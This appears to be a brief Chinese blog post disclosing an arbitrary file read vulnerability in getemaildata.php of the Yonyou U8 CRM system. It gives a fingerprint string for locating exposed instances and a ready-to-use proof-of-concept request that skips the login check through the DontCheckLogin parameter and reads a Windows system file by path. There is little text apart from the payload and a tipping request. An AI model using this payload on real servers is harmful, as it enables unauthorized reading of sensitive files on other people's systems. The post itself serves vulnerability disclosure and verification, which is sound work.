Yonyou U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件
Yonyou U8 CRM客户关系管理系统
web.body="YonyouU8CRM"
登陆页面
验证POC
/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!